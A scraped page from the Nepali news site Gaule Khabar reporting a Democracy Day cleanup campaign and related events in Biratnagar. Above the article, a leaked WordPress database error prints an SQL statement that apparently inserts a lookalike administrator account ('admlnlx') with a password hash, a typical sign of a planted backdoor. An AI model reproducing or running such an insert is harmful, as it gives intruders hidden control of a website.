WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B.eKrteH7fz.jPyKqUkOtLhPmsTgPa.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 08:28:35', '', 'admlnlx', 'admlnlx')

प्रजातन्त्र दिवसको अवसरमा सरसफाइ – Gaule Khabar

प्रजातन्त्र दिवसको अवसरमा सरसफाइ

प्रजातन्त्र दिवसको अवसरमा सरसफाइ

काठमाण्डौ । राष्ट्रिय प्रजातन्त्र दिवस–२०७८ को उपलक्ष्यमा आज विराटनगरको ट्राफिक चोकदेखि तीनपैनीसम्म नगरको दुवैतर्फ सफाइ गरिएको छ ।

प्रजातन्त्र दिवस मूल समारोह समिति मोरङका संयोजक प्रमुख जिल्ला अधिकारी काशीराज दाहालको नेतृत्वमा भएको सफाइ अभियानमा विराटनगर महानगरपालिकाका प्रमुख भीम पराजुली, सुरक्षा निकायका प्रमुख, कर्मचारी एवं सर्वसाधारणको सहभागिता थियो । विराट नगरपालिकाको संंयोजनमा भएको उक्त सरसफाइ कार्य सञ्चालन गर्नुका साथै नगरका विभिन्न सार्वजनिकस्थलमा राष्ट्रिय झण्डासमेत फहराएको छ ।

यसैगरी आजै जिल्लास्थित विभिन्न स्थानीय पालिकाका मुख्यमुख्य क्षेत्रमा सरसफाइ गर्ने कार्य सम्पन्न भएको बताएको छ । दिवसको उपलक्ष्यमा आजदेखि तीनदिन दीपावली गर्ने कार्यक्रम छ । यस्तै फागुन ७ गते बिहान प्रदेश नं १ आन्तरिक मामिला तथा कानुन मन्त्रालय, कर्मचारी मिलन केन्द्र, जिल्लास्थित विभिन्न ट्रेड युनियन तथा राष्ट्रसेवक कर्मचारी, विभिन्न सङ्घ÷सङ्गठनले संयुक्तरुपमा नगरमा रहेका वृद्धाश्रम, अनाथाश्रम र मानवसेवा आश्रममा रहेका ज्येष्ठ नागरिक, अशक्तलाई फलफूल वितरण गर्ने कार्यक्रम पनि छ ।

फागुन ८ गते बिहान नेपाल रेडक्रस सासाइटी मोरङ र कोशी अस्पताल विराटनगरको संयुक्त आयोजना अस्पतालमा रक्तदान कार्यक्रम सञ्चालन गर्ने कार्यक्रम रहेको बताएको छ । रासस

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका